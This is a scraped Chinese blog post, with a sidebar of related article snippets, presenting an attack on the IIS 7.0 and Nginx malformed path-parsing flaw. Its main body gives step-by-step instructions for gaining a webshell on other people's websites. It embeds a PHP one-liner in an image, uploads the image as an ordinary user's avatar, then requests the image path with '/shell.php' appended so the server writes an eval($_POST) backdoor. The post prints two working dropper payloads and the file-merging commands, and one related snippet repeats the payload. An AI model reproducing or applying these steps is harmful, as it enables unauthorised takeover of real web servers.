通杀IIS7.0畸形解析0day漏洞(类似Nginx那个0day)

最新推荐文章于 2022-11-10 17:58:06 发布
最新推荐文章于 2022-11-10 17:58:06 发布
阅读量1.9k 收藏
点赞数
分类专栏: Web 服务端 文章标签: iis nginx php dos 浏览器 cmd


在群里看见许多大牛在周杰伦官方留页面

一群小菜四处宣传,实在没必要

渗透方法其实和网上并没有区别

大家可以网上看看

通杀IIS7.0畸形解析0day漏洞

先合并一张PHP一句话图片马,合并方法:

①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif

②、用edjpgcom,进行图片和一句话木马的合并,

图片随便找一张.

【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到

edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】

一句话:

<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>

然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。

找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。

比如假设图片地址为http://www.xxx.com/fuck/1.jpg

则执行地址为http://www.xxx.com/fuck/1.jpg/shell.php

然后,会在目录下生成shell.php。

比如www.xxx.com/tupian/shell.php

shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。

上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 

找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。

在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。

<?fputs(fopen(“fuck.php”,”w”),”<?eval(\$_POST[fuck]);?>”)?>

 

做好一句话图片木马后往头像上传,访问头像地址,在后面随便加个/xx.php

剩下的你们懂得!

上面写的也很详细吧!

Yatere
关注
专栏目录
利用 Nginx 畸形解析漏洞 getshell
weixin_45253622的博客
12-09 3643
Nginx Nginx 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好。 漏洞描述: 对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。 例:info.jpg后面加上/xxx.php,会将info.jpgphp解析漏洞原理: 查看 nginx 配置文件: cd /home/ch1/Desktop
第八天Apache解析漏洞IIS 解析漏洞Nginx 解析漏洞文件上传%oo截断
代码审计
03-11 4765
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 文件名后缀就一个%00字节,可以截断某些函数对文件名的判断。在许多语言函数中,处理字符串的函数中0x00被认为是终止符。 例如: 网站上传函数处理xxx.php%00.jpg时,首先后缀名是合法的jpg格式,可以上传,在保存文件时,遇到%00字符丢弃后面的jpg,文件后缀最终保存的后缀名为xxx.php ...
IIS7.0 畸形解析
weixin_30752377的博客
04-27 217
1.jpg 内容“<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>”www.xxxx.com/upload/1.jpg www.xxxx.com/upload/1.jpg/shell.php 访问后生成下面的一句话www.xxxx.com/upload/shell.phpIIS7.0畸形解析和这个类似。...
通杀IIS7.0畸形解析0day漏洞
收集盒 Book box
09-02 2602
找到使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。 ”)?>
80后发现nginx 0day漏洞,上传图片可入侵100万服务器
weixin_30302609的博客
12-06 403
国内顶级安全团队80sec于5.20日下午6点发布了一个关于nginx漏洞通告,由于该漏洞的存在,使用nginx+php组建的网站只要允许上传图片就可能被黑客入侵,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁;已经有一些网站被黑了,管理员速修复! 没错,重申一次,由于nginx漏洞,这100万台服务器可能通过上传图片的方法被黑客轻易的植入木马。植入木马的过程也非常简单,就是把木马...
【关于nginx升级---存在0day漏洞
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
11-10 1万+
0day漏洞——又称“零日漏洞”(zero-day),是漏洞已经被发现(有可能未被公开),但是官方还没有发布相关补丁的漏洞
Nginx 0day LDAP RCE 漏洞情报分析
weixin_42451330的博客
08-31 1243
本文介绍Nginx 0day LDAP RCE漏洞影响范围并解释NGINX LDAP参考实现
中标麒麟V7.0系统nginx安装包.rar
03-12
【中标麒麟V7.0系统nginx安装包】 在IT领域,服务器配置和管理是至关重要的环节,而Nginx作为一款高性能的Web服务器和反向代理服务器,因其高并发处理能力、轻量级架构和丰富的模块支持,在业界广泛应用。本文将...
iis7.5 解析漏洞 php,Web安全 - 解析漏洞
weixin_39665992的博客
03-09 1161
一、原理解析漏洞主要是一些特殊文件被Apache、IISNginx等Web容器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞。二、Apache1. 多后缀解析一个文件名为 test.x1.x2.x3 的文件,Apache会从x3的位置往x1的位置开始尝试解析,如果x3不属于 Apache解析的扩展名,那么Apache会尝试去解析x2, 这样一直往前尝试,直到遇到一个能解析的扩展名为止。例如...
NGINX 0 DAY LDAP RCE 漏洞来龙去脉
u012516914的专栏
07-30 2596
背景nginx 0 day RCE 漏洞影响 nginx 18.1。根据 AgainstTheWest Github https://github.com/AgainstTheWest/NginxDay 存储库,此错误与 nginx 中的 LDAP-auth 守护程序有关,因为 LDAP 与 Nginx 的交互不多,但是,有一个与 Nginx 一起使用的 ldap-aut...
edjpgcom(适合用于Local File Inclusion Vulnerability)
12-10
edjpgcom(适合用于Local File Inclusion Vulnerability) edjpgcom可在JPG文件中插入注释, 而不会损坏原来的文件(即插入内容后图片任可浏览), 适合用于Local File Inclusion Vulnerability milw0rm有动画 http://milw0rm.org/video/watch.php?id=57 有篇文章也有用到,搜“又一上传突破” 百度Google直接“edjpgcom”貌似找不到,搜“jpg comment edit”
edjpgcom图片插入一句话工具(1).rar
04-08
这是让图片带有小马的一键生成工具,有需要的可以自己下。挺好用的一个小程序,如果你也想成为一个白帽,可以先拿这个练练手。
\edjpgcom(1).zip
02-11
\edjpgcom(1).zip\edjpgcom(1).zip\edjpgcom(1).zip
edjpgcom.exe
01-22
edjpgcom是一个很精巧强悍的小工具. 主要功能是能在图片里插入一句话马或者小马,伪造的比较好。 链接:https://pan.baidu.com/s/1o6APzao-DJ8zwP9RvD7lxg 提取码:dy3p
关于 Nginx 0day 漏洞,需要采取哪些措施?
技术宅,专注云原生、Go、Linux、Java等技术分享,原创文章、效率工具、实战解决方案!关注我,了解互联网动态,学 IT 不迷路
08-01 2120
黑客组织 BlueHornet 在推特上发布了有关 NGINX 1.18 的实验性漏洞,并警告受其影响的公司。4 月 10 日,BlueHornet 声称利用 NGINX 漏洞入侵了瑞银证券中国分行。
「bug」目前Nginx 1.21.5以下具有0day风险
掘金者说
08-01 4440
截至2022年7月31日15时,Nginx官方仍未透露关于该0day漏洞的细节以及POC,不过从Nginx官方下载网站中,我们可以明显地看到已经下线了1.21版本的下载地址。从Nginx官方的可疑行为中,我们能够大胆猜测是否其已经发现了该漏洞的存在,并且封锁消息。目前微步云社区已经对该0day漏洞进行高价悬赏,并且其希望提供有效的信息与线索。......
php nginx 0day,CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞预警
weixin_32060429的博客
03-22 130
0x00 漏洞背景2019年10月23日, 360CERT监测到 PHP 官方发布了在nginx配置不当的情况下 php-fpm 可导致远程代码执行的漏洞更新。360CERT判断漏洞等级为中危,影响面有限。但由于是配置文件的开放性。还请使用nginx+php-fpm的服务管理员/运维人员及时做好自查自检工作。0x01 漏洞详情进而导致可以通过FCGI_PUTENV与PHP_VALUE相结合...
php nginx 0day,利用nginx日志结合本地包含漏洞GetShell
weixin_35662417的博客
03-22 333
0前言在WEB渗透测试中尤其是PHP,经常会挖到LFI漏洞,想要GETSHELL,但无奈没有文件上传的途径,这里给一个思路,抛砖引玉。近日施耐德电气爆出的漏洞,首先得到了一个本地包含,在这里作为靶目标使用。1.本地获得利用思路umotion/themes/schneider/include/css.php?css=../../../../../../../etc/nginx&theme=i...
php畸形漏洞 菜刀直接连接,1.2 文件上传之解析漏洞
weixin_35110330的博客
03-24 218
浅谈文件解析及上传漏洞文件解析漏洞解析漏洞主要是一些特殊文件被iis、Apache、Nginx等服务在某种情况下解释成脚本文件格式并得以执行而产生的漏洞iis 5.x/6.0解析漏洞iis6.0解析漏洞主要有以下三种:??1. 目录解析漏洞 /xx.asp/xx.jpg??在网站下创建文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都被iis当做asp文件来解析 ...
nginx 0day
最新发布
08-17
Nginx 0day是指Nginx的一个零日漏洞,其中涉及到了Nginx的LDAP-auth守护程序。该漏洞的影响范围是Nginx版本18.1。根据AgainstTheWest的GitHub存储库,该漏洞主要与Nginx中的LDAP-auth守护程序有关,该守护程序与Nginx一起使用,用于访问私有的GitHub、Bitbucket、Jenkins和Gitlab实例。虽然该漏洞在4月11日时已被公开,并且Nginx已发布了一篇博客来描述这个漏洞,但需要注意的是,该漏洞只影响Nginx的LDAP参考实现,而不影响Nginx的开源和Nginx Plus版本。如果您没有使用LDAP参考实现,那么您无需采取任何措施。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [关于 Nginx 0day 漏洞,需要采取哪些措施?](https://blog.csdn.net/ll837448792/article/details/126105462)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NGINX 0 DAY LDAP RCE 漏洞来龙去脉](https://blog.csdn.net/u012516914/article/details/126080132)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值